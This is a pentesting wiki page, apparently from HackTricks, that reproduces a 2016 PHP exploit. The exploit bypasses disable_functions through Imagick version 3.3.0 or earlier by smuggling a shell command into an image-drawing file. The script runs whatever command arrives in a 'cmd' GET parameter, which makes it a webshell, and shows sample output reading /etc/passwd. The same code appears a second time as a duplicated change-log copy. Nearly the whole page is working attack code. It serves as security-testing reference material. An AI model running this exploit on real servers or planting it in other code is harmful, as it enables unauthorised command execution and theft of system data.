hacktricks/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md

# disable\_functions bypass - Imagick &lt;= 3.3.0 PHP &gt;= 5.4 Exploit

## Imagick &lt;= 3.3.0 PHP &gt;= 5.4 Exploit

From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)

```php
# Exploit Title: PHP Imagick disable_functions Bypass
# Date: 2016-05-04
# Exploit Author: RicterZ (ricter@chaitin.com)
# Vendor Homepage: https://pecl.php.net/package/imagick
# Version: Imagick  <= 3.3.0 PHP >= 5.4
# Test on: Ubuntu 12.04
# Exploit:
<?php
# PHP Imagick disable_functions Bypass
# Author: Ricter <ricter@chaitin.com>
#
# $ curl "127.0.0.1:8080/exploit.php?cmd=cat%20/etc/passwd"
# <pre>
# Disable functions: exec,passthru,shell_exec,system,popen
# Run command: cat /etc/passwd
# ====================
# root:x:0:0:root:/root:/usr/local/bin/fish
# daemon:x:1:1:daemon:/usr/sbin:/bin/sh
# bin:x:2:2:bin:/bin:/bin/sh
# sys:x:3:3:sys:/dev:/bin/sh
# sync:x:4:65534:sync:/bin:/bin/sync
# games:x:5:60:games:/usr/games:/bin/sh
# ...
# </pre>
echo "Disable functions: " . ini_get("disable_functions") . "\n";
$command = isset($_GET['cmd']) ? $_GET['cmd'] : 'id';
echo "Run command: $command\n====================\n";
 
$data_file = tempnam('/tmp', 'img');
$imagick_file = tempnam('/tmp', 'img');
 
$exploit = <<<EOF
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/image.jpg"|$command>$data_file")'
pop graphic-context
EOF;
 
file_put_contents("$imagick_file", $exploit);
$thumb = new Imagick();
$thumb->readImage("$imagick_file");
$thumb->writeImage(tempnam('/tmp', 'img'));
$thumb->clear();
$thumb->destroy();
 
echo file_get_contents($data_file);
?>
```
GitBook: [master] 17 pages modified 2020-11-14 18:21:56 +00:00			`# disable\_functions bypass - Imagick <= 3.3.0 PHP >= 5.4 Exploit`

			`## Imagick <= 3.3.0 PHP >= 5.4 Exploit`

			`From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)`

			```php
			`# Exploit Title: PHP Imagick disable_functions Bypass`
			`# Date: 2016-05-04`
			`# Exploit Author: RicterZ (ricter@chaitin.com)`
			`# Vendor Homepage: https://pecl.php.net/package/imagick`
			`# Version: Imagick <= 3.3.0 PHP >= 5.4`
			`# Test on: Ubuntu 12.04`
			`# Exploit:`
			`<?php`
			`# PHP Imagick disable_functions Bypass`
			`# Author: Ricter <ricter@chaitin.com>`
			`#`
			`# $ curl "127.0.0.1:8080/exploit.php?cmd=cat%20/etc/passwd"`
			`# <pre>`
			`# Disable functions: exec,passthru,shell_exec,system,popen`
			`# Run command: cat /etc/passwd`
			`# ====================`
			`# root:x:0:0:root:/root:/usr/local/bin/fish`
			`# daemon:x:1:1:daemon:/usr/sbin:/bin/sh`
			`# bin:x:2:2:bin:/bin:/bin/sh`
			`# sys:x:3:3:sys:/dev:/bin/sh`
			`# sync:x:4:65534:sync:/bin:/bin/sync`
			`# games:x:5:60:games:/usr/games:/bin/sh`
			`# ...`
			`# </pre>`
			`echo "Disable functions: " . ini_get("disable_functions") . "\n";`
			`$command = isset($_GET['cmd']) ? $_GET['cmd'] : 'id';`
			`echo "Run command: $command\n====================\n";`

			`$data_file = tempnam('/tmp', 'img');`
			`$imagick_file = tempnam('/tmp', 'img');`

			`$exploit = <<<EOF`
			`push graphic-context`
			`viewbox 0 0 640 480`
			`fill 'url(https://127.0.0.1/image.jpg"\|$command>$data_file")'`
			`pop graphic-context`
			`EOF;`

			`file_put_contents("$imagick_file", $exploit);`
			`$thumb = new Imagick();`
			`$thumb->readImage("$imagick_file");`
			`$thumb->writeImage(tempnam('/tmp', 'img'));`
			`$thumb->clear();`
			`$thumb->destroy();`

			`echo file_get_contents($data_file);`
			`?>`
			```